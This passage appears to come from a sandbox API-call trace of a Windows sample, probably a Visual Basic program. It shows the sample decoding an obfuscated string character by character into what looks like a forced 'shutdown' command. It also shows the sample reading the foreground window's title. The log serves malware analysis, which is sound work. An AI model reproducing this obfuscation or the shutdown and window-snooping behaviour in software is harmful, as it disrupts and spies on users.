lpWideCharStr="u") returned 1 [0166.492] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f8ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.492] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.492] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x11596fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0166.493] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f8ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.493] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.493] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0166.493] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f8ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.494] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.494] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1159724, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0166.494] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.495] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f8ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.495] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.495] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x11596fc, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0166.495] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.495] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f8ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.496] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.496] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0166.496] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f8ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.496] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.496] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1159724, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0166.497] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f8ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.497] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x11596fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0166.497] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f8ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.498] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.498] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0166.498] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.499] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f8ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.506] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1159724, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0166.506] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.506] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f8ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.507] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x11596fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0166.507] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.507] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f8ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.508] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.508] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0166.508] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.508] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f8ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.508] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.509] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11596fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0166.509] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.509] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f8ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.509] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.509] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0166.510] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f8ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.510] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.510] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x11596fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0166.510] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f8ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.511] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.511] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0166.511] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.512] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f8ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.512] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x11596fc, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0166.512] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.513] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f8ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.513] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.513] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0166.513] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.513] GetForegroundWindow () returned 0x102c2 [0166.514] GetLastError () returned 0x0 [0166.514] SysStringLen (param_1=" ") returned 0xff [0166.514] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0166.514] SysStringLen (param_1=" ") returned 0xff [0166.514] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0166.514] GetWindowTextA (in: hWnd=0x102c2, lpString=0x11644c4, nMaxCount=255 | out: lpString="Activity Arrive Event") returned 21 [0166.514] GetLastError () returned 0x0 [0166.528] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0166.528] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0166.528] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0166.528] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Activity Arrive Event") returned 256 [0166.528] SysStringLen (param_1="Act") returned 0x3 [0166.528] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Act", cchWideChar=4, lpMultiByteStr=0x1159724, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Act", lpUsedDefaultChar=0x0) returned 4 [0166.529] SetWindowTextA (hWnd=0x103c4, lpString="Act") returned 1 [0166.529] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0166.529] GetFocus () returned 0x0 [0166.529] lstrlenA (lpString="Act") returned 3 [0166.529] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x1159724) returned 0x1 [0166.529] IsWindow (hWnd=0x103c4) returned 1 [0166.530] IsWindow (hWnd=0x103c4) returned 1 [0166.530] IsWindow (hWnd=0x103c4) returned 1 [0166.534] IsWindow (hWnd=0x103c4) returned 1 [0166.534] GetFocus () returned 0x0 [0166.535] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0166.535] GetFocus () returned 0x0 [0166.535] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x4) returned 0x10ebcd0 [0166.535] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x4, lParam=0x10ebcd0) returned 0x3 [0166.535] GetFocus () returned 0x0 [0166.535] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Act", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0166.535] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Act", cbMultiByte=-1, lpWideCharStr=0x1159724, cchWideChar=4 | out: lpWideCharStr="Act") returned 4 [0166.535] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0166.535] VarCmp (pvarLeft=0x28f990, pvarRight=0x28f9f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0166.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f926, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.537] VarSub (in: pvarLeft=0x28f9f8, pvarRight=0x28f990, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0166.537] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1159724, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0166.537] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0166.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f926, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.537] VarSub (in: pvarLeft=0x28f9f8, pvarRight=0x28f990, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0166.538] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0166.538] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0166.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f926, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.538] VarSub (in: pvarLeft=0x28f9f8, pvarRight=0x28f990, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0166.538] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0166.538] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0166.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f926, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.539] VarSub (in: pvarLeft=0x28f9f8, pvarRight=0x28f990, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0166.539] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1159724, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0166.539] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0166.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f926, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.540] VarSub (in: pvarLeft=0x28f9f8, pvarRight=0x28f990, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0166.540] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0166.540] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0166.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f926, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.541] VarSub (in: pvarLeft=0x28f9f8, pvarRight=0x28f990, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0166.541] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0166.541] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0166.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f926, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.541] VarSub (in: pvarLeft=0x28f9f8, pvarRight=0x28f990, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0166.541] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x1159724, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0166.541] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0166.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f926, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.542] VarSub (in: pvarLeft=0x28f9f8, pvarRight=0x28f990, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0166.542] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0166.542] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0166.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f926, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.543] VarSub (in: pvarLeft=0x28f9f8, pvarRight=0x28f990, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0166.543] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0166.543] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0166.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f926, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.544] VarSub (in: pvarLeft=0x28f9f8, pvarRight=0x28f990, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0166.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1159724, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0166.544] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0166.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f926, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.544] VarSub (in: pvarLeft=0x28f9f8, pvarRight=0x28f990, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0166.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0166.545] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0166.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f926, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.545] VarSub (in: pvarLeft=0x28f9f8, pvarRight=0x28f990, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0166.545] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0166.545] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0166.587] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f926, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.587] VarSub (in: pvarLeft=0x28f9f8, pvarRight=0x28f990, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0166.588] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1159724, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0166.588] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0166.588] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f926, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.588] VarSub (in: pvarLeft=0x28f9f8, pvarRight=0x28f990, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0166.588] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0166.588] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, 